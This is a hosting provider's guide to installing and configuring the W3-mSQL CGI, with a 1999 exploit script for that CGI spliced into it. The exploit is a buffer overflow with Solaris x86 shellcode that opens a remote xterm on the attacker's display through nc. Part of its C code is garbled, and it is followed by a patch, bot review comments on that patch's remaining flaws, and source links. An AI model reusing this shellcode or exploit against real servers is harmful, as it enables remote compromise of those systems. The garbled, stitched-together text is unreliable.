W3-mSQL provides a programmatic interface to the mSQL database system from within an HTML document. It enables the development of entire programs within a Web page while offering comprehensive access control and security features.
Installation
To install W3-mSQL on your Virtual Private Server, connect to your server via Telnet or SSH and do the following, according to your server O/S:
% vinstall w3-msql
% chmod 755 ~/www/cgi-bin/w3-auth ~/www/cgi-bin/w3-msql
- If you don't know the Virtual Private Server O/S, try the following:
Configuration
W3-mSQL enhanced HTML files must be pre-processed by the ~/www/cgi-bin/w3-msql CGI before the web server sends the results to the requesting client. Normally, this pre-processing requires the ~/www/cgi-bin/w3-msql CGI to appear in the URL of each W3-mSQL file on your site. For example:
http://YOUR-DOMAIN.NAME/cgi-bin/w3-msql/file.msql
The Apache Web Server can be configured to automatically pre-process W3-mSQL files with the .msql file extension. To set up W3-mSQL redirection, add the following lines to the ~/www/conf/httpd.conf file (or the ~/www/conf/srm.conf file, if your server was configured before Dec. 8, 1998):
AddHandler htmsql msql
Action htmsql /cgi-bin/w3-msql
After doing this, it is possible to access W3-mSQL files this way:
http://YOUR-DOMAIN.NAME/file.msql
The .msql files are automatically pre-processed by the ~/www/cgi-bin/w3-msql CGI without the ~/www/cgi-bin/w3-msql CGI appearing in the URL path.
Sample Application
A sample W3-mSQL application is also available for installation on the Virtual Private Servers. You can install the simple example by unpacking an archive file.
% cd
% tar xvf /usr/local/contrib/w3-msql-demo.tar
Once the files are in place, run the install script.
% cd ~/www/htdocs/bookmarks
% ./setup_bookmark
You can then access the sample application at:
http://YOUR-DOMAIN.NAME/bookmarks/Welcome.html
/*
 * !Hispahack Research Team
 * http://hispahack.ccc.de
 *
 * Xploit for /cgi-bin/w3-msql (msql 2.0.4.1 - 2.0.11)
 *
 * Platform: Solaris x86
 * Feel free to port it to other architectures, if you can...
 * If so mail me plz.
 *
 * By: Zhodiac
 *
 * Steps: 1) gcc -o w3-msql-xploit w3-msql-xploit.c
 *        2) xhost +
 *        3) ./w3-msql-xploit | nc
 *        4) Take a cup of coffee, some kind of drug or whatever
 *           stimulates you at hacking time... while the xterm is coming
 *           or while you are getting raided.
 *
 * #include
 *
 * Madrid, 28/10/99
 *
 * Spain r0x
 *
 */

#include
#include
#include

/******************/
/* Customize this */
/******************/

//#define LEN_VAR 50 /* mSQL 2.0.4 - 2.0.10.1 */
#define LEN_VAR 128 /* mSQL 2.0.11 */

// Solaris x86
#define ADDR 0x8045f8

// Shellcode Solaris x86
char shellcode[]= /* By Zhodiac */
"\x8b\x74\x24\xfc\xb8\x2e\x61\x68\x6d\x05\x01\x01\x01\x01\x39\x06"
"\x74\x03\x46\xeb\xf9\x33\xc0\x89\x46\xea\x88\x46\xef\x89\x46\xfc"
"\x88\x46\x07\x46\x46\x88\x46\x08\x4e\x4e\x88\x46\xff\xb0\x1f\xfe"
"\xc0\x88\x46\x21\x88\x46\x2a\x33\xc0\x89\x76\xf0\x8d\x5e\x08\x89"
"\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x50\x8d\x5e\xf0\x53\x56\x56\xb0"
"\x3b\x9a\xaa\xaa\xaa\xaa\x07\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
"/bin/shA-cA/usr/openwin/bin/xtermA-displayA";

#define ADDR_TIMES 12
#define BUFSIZE LEN_VAR+15*1024+LEN_VAR+ADDR_TIMES*4-16
#define NOP 0x90

int main (int argc, char *argv[]) {
  char *buf, *ptr;
  long addr=ADDR;
  int aux;

  if (argc<3 0x000000ff="" 0x0000ff00="" 80="" addr="" amp="" argv="" aux="0;aux<ADDR_TIMES;aux++)" buf="" char="" display="" exit="" for="" if="" malloc="" memcpy="" memset="" n="" nc="" perror="" printf="" ptr="" s="" sage:="" shellcode="" strlen="" target="">> 8;
    ptr[2] = (addr & 0x00ff0000) >> 16;
    ptr[3] = (addr & 0xff000000) >> 24;
    ptr+=4;
  }

  printf("POST /cgi-bin/w3-msql/index.html HTTP/1.0\n");
  printf("Connection: Keep-Alive\n");
  printf("User-Agent: Mozilla/4.60 [en] (X11; I; Linux 2.0.38 i686\n");
  printf("Host: 
%s\n",argv[1]); printf("Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg\n"); printf("Accept-Encoding: gzip\n"); printf("Accept-Language: en\n"); printf("Accept-Charset: iso-8859-1,*,utf-8\n"); printf("Content-type: multipart/form-data\n"); printf("Content-length: %i\n\n",BUFSIZE); printf("%s \n\n\n",buf); free(buf); } ------- w3-msql-xploit.c --------- - Fix: ====== Best solution is to wait for a new patched version, meanwhile here you have a patch that will stop this attack and some other (be aware that this patch was done after a total revision of the code, maybe there are some other overflows). ------ w3-msql.patch --------- 410c410 < scanf("%s ", boundary); --- > scanf("%128s ", boundary); 418c418 < strcat(var, buffer); --- > strncat(var, buffer,sizeof(buffer)); 428c428 < scanf(" Content-Type: %s ", buffer); --- > scanf(" Content-Type: %15360s ", buffer); ------ w3-msql.patch --------- piscis:~# patch w3-msql.c w3-msql.patch piscis:~# Spain r0x Greetz :) Zhodiac3>
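Review bot: at line 410, the width in `scanf("%128s ", boundary)` does not count the terminating NUL, so the call is only safe if `boundary` holds at least 129 bytes. The declaration is not visible in the patch; either confirm the size or set the width to the array size minus one.

Review bot: at line 418, `strncat(var, buffer,sizeof(buffer))` bounds the append by the size of the source, not by the space left in `var`, so the destination can still overflow once `var` is partly filled. The limit should be the room remaining in the destination, for example `sizeof(var) - strlen(var) - 1` if `var` is an array, and input that does not fit should be rejected rather than silently truncated.

Review bot: at line 428, the return value of `scanf(" Content-Type: %15360s ", buffer)` is still ignored, and a token longer than the width is cut off with the remainder left on stdin for the next read. Check the return value and reject the request when the field does not fit; as with line 410, the width excludes the NUL, so `buffer` needs at least 15361 bytes.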
http://lwn.net/1999/1230/a/msql.html
https://www.teamits.com/internet/support/vps/msql/w3msql.html